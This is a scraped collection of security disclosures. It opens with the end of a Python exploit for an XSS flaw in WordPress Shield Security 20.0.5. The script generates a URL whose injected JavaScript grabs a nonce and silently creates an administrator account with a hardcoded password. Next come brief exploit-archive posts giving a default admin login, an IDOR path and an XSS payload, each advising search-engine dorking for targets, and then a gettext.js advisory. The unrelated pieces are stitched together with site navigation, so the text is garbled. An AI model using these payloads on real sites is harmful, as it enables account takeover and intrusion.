    payload_template = (  
        "var xhrNonce = new XMLHttpRequest(); "  
        "xhrNonce.open('GET', '/wp-admin/user-new.php', true); "  
        "xhrNonce.onload = function() {{ "  
        "if (xhrNonce.status === 200) {{ "  
        "var nonce = xhrNonce.responseText.match(/name=\"_wpnonce_create-user\" value=\"([a-zA-Z0-9]+)\"/)[1]; "  
        "var xhr = new XMLHttpRequest(); "  
        "xhr.open('POST', '/wp-admin/user-new.php', true); "  
        "xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); "  
        "xhr.setRequestHeader('Referer', '{target}/wp-admin/user-new.php'); "  
        "xhr.setRequestHeader('Origin', '{target}'); "  
        "var params = 'action=createuser&_wpnonce_create-user=' + nonce + "  
        "'&_wp_http_referer=%2Fwp-admin%2Fuser-new.php"  
        "&user_login={username}&email={email}"  
        "&first_name={first_name}&last_name={last_name}&url=test"  
        "&pass1={password}&pass2={password}&role=administrator"  
        "&createuser=Add+New+User'; "  
        "xhr.send(params); "  
        "xhr.onload = function() {{ "  
        "if (xhr.status == 200) {{ "  
        "console.log('Admin user created successfully'); "  
        "window.location.href = '{target}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=overview'; "  
        "}} else {{ console.log('Error occurred: ' + xhr.statusText); }} "  
        "}}; "  
        "}} else {{ console.log('Error fetching nonce: ' + xhrNonce.statusText); }} }}; "  
        "xhrNonce.send();"  
    )

    # Formatting the payload with the provided details  
    payload = payload_template.format(  
        target=target_url,  
        username=username,  
        email=urllib.parse.quote(email),  
        first_name=first_name,  
        last_name=last_name,  
        password=urllib.parse.quote(hardcoded_password)  
    )

    # URL encode the payload and generate the full URL for the XSS attack  
    encoded_payload = urllib.parse.quote(f"<script>{payload}</script>")  
    full_url = f"{target_url}/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub={encoded_payload}"

    return full_url

if __name__ == "__main__":  
    try:  
        # Print the banner  
        print_banner()

        # Check for help menu flag and print help if necessary  
        if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:  
            print_help()  
            sys.exit(0)

        # Get the target URL from the command-line argument  
        raw_target_url = sys.argv[1]  
        target_url = format_target_url(raw_target_url)

        # Check if the target is vulnerable  
        if not check_vulnerability(target_url):  
            sys.exit(1)

        # Get user input for the new admin account details  
        username = input(f"{blue}Enter username: {reset}")  
        email = input(f"{blue}Enter email: {reset}")  
        first_name = input(f"{blue}Enter first name: {reset}")  
        last_name = input(f"{blue}Enter last name: {reset}")

        # Display the hardcoded password  
        hardcoded_password = "HaxorStrongAFPassword123!!"  
        print(f"\n{yellow}Using hardcoded password: {hardcoded_password}{reset}")

        # Generate and display the XSS payload URL  
        xss_payload_url = generate_xss_payload(target_url, username, email, first_name, last_name)  
        print(f"\n{green}Generated XSS Payload URL: {xss_payload_url}{reset}")

    # Handle keyboard interruption  
    except KeyboardInterrupt:  
        print(f"\n{red}Script interrupted by user.{reset}")  
        sys.exit(1)  
    # Catch any other exceptions and display an error message  
    except Exception as e:  
        print(f"{red}An error occurred: {e}{reset}")  
        sys.exit(1)

WordPress Shield Security 20.0.5 Cross Site Scripting

Home Owners Collection Management System version 1.0 suffers from an ignored default credential vulnerability.

**Home Owners Collection Management System 1.0 Insecure Settings**

Posted Aug 16, 2024

Authored by indoushka

Home Owners Collection Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 94fb8d8c82f8132953cb67c97a9b682c8e63a436a475a575173b89ddf54daa9f

Download | Favorite | View

**Home Owners Collection Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Home Owners Collection Management System v1.0 Insecure Settings Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,433)
*   Arbitrary (16,884)
*   BBS (2,859)
*   Bypass (1,865)
*   CGI (1,033)
*   Code Execution (7,817)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,088)
*   Encryption (2,389)
*   Exploit (53,217)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (897)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,665)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,612)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,999)
*   Web (9,966)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,789)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,546)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,754)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Home Owners Collection Management System 1.0 Insecure Settings

Giftora version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Giftora V 1.0 XSS Vulnerability                                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script                                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /search?q=1'%22()%26%25<acx><ScRiPt%20>prompt(966079)</ScRiPt>[+] save code as poc.html [+] payload : https://127.0.0.1/giftora.webister.net//search?q=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(966079)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Giftora 1.0 Cross Site Scripting

Bhojon Restaurant Management System version 3.0 suffers from an insecure direct object reference vulnerability.

**Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference**

Posted Aug 16, 2024

Authored by indoushka

Bhojon Restaurant Management System version 3.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 98c12c7a5556d4399b71f053e8f21eaf5c59e49e15d4bf7f6b1980de56fec3c2

Download | Favorite | View

**Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Bhojon restaurant management system v3.0 IDOR Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/restaurant-management-system.php#live_demo                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /dashboard/autoupdate[+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,433)
*   Arbitrary (16,884)
*   BBS (2,859)
*   Bypass (1,865)
*   CGI (1,033)
*   Code Execution (7,817)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,088)
*   Encryption (2,389)
*   Exploit (53,217)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (897)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,665)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,612)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,999)
*   Web (9,966)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,789)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,546)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,754)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference

### Impact
Possible vulnerability to XSS injection if .po dictionary definition files is corrupted

### Patches
Update gettext.js to 2.0.3

### Workarounds
Make sure you control the origin of the definition catalog to prevent the use of this flaw in the definition of plural forms.


Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   Explore
    
    *   Learning Pathways
    *   White papers, Ebooks, Webinars
    *   Customer Stories
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-43370

**gettext.js has a Cross-site Scripting injection**

High severity GitHub Reviewed Published Aug 15, 2024 in guillaumepotier/gettext.js • Updated Aug 15, 2024

**Package**

npm gettext.js (npm)

**Affected versions**

< 2.0.3

**Description**

**Impact**

Possible vulnerability to XSS injection if .po dictionary definition files is corrupted

**Patches**

Update gettext.js to 2.0.3

**Workarounds**

Make sure you control the origin of the definition catalog to prevent the use of this flaw in the definition of plural forms.

**References**

*   GHSA-vwhg-jwr4-vxgg

Published to the GitHub Advisory Database

Aug 15, 2024

Last updated

Aug 15, 2024

Tag

#xss